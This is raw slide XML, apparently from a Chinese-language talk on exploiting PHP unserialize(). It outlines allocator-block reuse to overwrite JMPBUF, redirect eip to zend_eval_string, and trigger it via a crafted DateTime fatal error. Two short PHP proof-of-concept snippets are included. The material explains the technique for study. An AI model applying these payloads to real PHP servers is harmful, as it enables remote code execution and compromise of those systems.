              <a:t>2.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>序列数据结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反序列化过程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04B-3115-437D-A8D7-0CB554092D76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53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5.7 Overwrite JMPBUF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5.7.1 JMPBUF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>位置向前搜索内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>5.7.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>搜索 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XX 00 00 00 ( 0x10 &lt;= XX &lt;= 0x88 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>，当作一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>内存缓存块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>5.7.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>释放 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>内存缓存块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>5.7.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>重用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>内存缓存块（一次栈上写数据机会，自定义一个缓存块）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>5.7.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>释放自定义缓存块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>5.7.6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>重用自定义缓存块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>5.7.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>重复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>5.7.5~5.7.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>过程，直到覆盖 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JMPBUF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>，控制异常恢复时寄存器环境</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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C6DB-DF82-47CD-BAA4-AC1D1EC2E3B3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40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8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5.7.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>释放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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66" y="2303437"/>
            <a:ext cx="11229867" cy="2251125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63D3-CB64-4F53-B937-6D95D0815E60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41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38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5.7.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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66" y="2303437"/>
            <a:ext cx="11229867" cy="2251125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2EB3-B007-4FB2-B5B7-22A9EDA1A38F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42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69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5.7.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>释放自定义缓存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>块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D296-D4DF-4506-9D37-13E8096F14BC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43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53836" y="2238187"/>
            <a:ext cx="16099672" cy="2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5.7.6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自定义缓存块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A047-E531-46D9-ADA6-AD0A5D7530C8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44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18" y="2238187"/>
            <a:ext cx="11360163" cy="2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9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5.7.5.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再释放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自定义缓存块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38DC-C39B-40FB-9A50-12E39712F245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45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703" y="2238187"/>
            <a:ext cx="11384594" cy="2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4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5.7.6.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再重用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自定义缓存块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0B3A-96ED-4D14-A70B-3CDF0A0B655B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46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703" y="2238187"/>
            <a:ext cx="11384594" cy="2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65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5.7.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再再释放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自定义缓存块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51" y="2238187"/>
            <a:ext cx="12003498" cy="2381625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972E-644B-457B-B742-C3D9CABE95E7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47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428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5.7.6.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再再重用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自定义缓存块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e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>di</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> == JMPBUF + 0x18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>==  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>zend_eval_string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phpcode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retval_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>string_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)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E847-ECFB-41CF-8F05-E17BB28622A5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48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361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5.7.6.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再再重用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自定义缓存块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402" y="1867078"/>
            <a:ext cx="9943196" cy="3123844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0661-40B3-458C-AF3A-17038C35E7AD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49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104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048000" y="648230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400" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>StdClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>str_repeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>aaa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$u,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>bbb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>ccc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$u;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>($m);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>", $z);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>($z);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>($z);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>($y)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>?&gt;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5624-51E6-43DB-8AD9-EC25468F0A51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563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5.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exception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unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>触发一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FATAL ERROR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php_error_cb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>zend_bailout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>langjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>回到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JMPBUF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中的寄存器环境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393D-2FE8-4FEF-A146-A857B71371B8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50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4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5.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Trigger exception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967285" y="2860175"/>
            <a:ext cx="1025743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/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" err="1"/>
              <a:t>var_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" err="1"/>
              <a:t>unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>('O:8:"DateTime":1:{s:10:"_date_time";s:25:"-001-11-30T00:00:00+01:00";}'));</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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42E5-7ABD-452E-BC37-6DBEAD288DA0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51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9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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参考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>
